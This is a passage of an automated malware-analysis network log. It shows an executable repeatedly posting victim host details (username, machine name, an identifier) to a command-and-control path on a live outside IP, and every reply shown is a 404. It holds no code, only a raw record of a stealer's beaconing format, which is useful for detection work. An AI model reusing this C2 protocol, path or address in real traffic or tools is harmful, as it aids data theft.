Dec 9, 2024 08:51:54.252533913 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:54.371881008 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:51:55.804064035 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49736	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:56.067589998 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:56.186858892 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:00.480139971 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49755	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:00.754667044 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:00.874032021 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:02.310697079 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49757	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:02.804815054 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:02.924151897 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:07.215265989 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49773	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:07.474473000 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:07.593801975 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:09.028433084 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49775	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:09.287523031 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:09.406949043 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:10.848207951 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49781	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:11.112812042 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:11.232352972 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:13.029788017 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49787	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:13.303529024 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:13.423060894 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:15.246920109 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49793	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:15.562992096 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:15.682605028 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:16.935839891 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49799	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:17.204816103 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:17.325150013 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:21.764257908 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49811	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:22.035048008 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:22.154447079 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:23.587380886 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49818	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:23.852942944 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:23.972500086 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:25.264223099 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49823	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:25.533881903 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:25.653268099 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:27.091386080 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49828	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:27.501702070 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:27.621177912 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:28.905251026 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49833	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:29.190929890 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:29.310465097 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:30.743460894 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49836	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:31.022804022 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:31.142638922 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:32.430124998 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49841	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:32.724689007 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:32.844274998 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:34.283608913 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49848	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:34.553539991 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:34.672995090 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:36.102579117 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49854	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:36.360389948 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:36.479932070 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:37.817862034 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49859	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:38.095002890 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:38.214536905 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:39.497653008 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49863	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:39.752880096 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:39.872509003 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:41.152460098 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49867	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:41.409809113 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
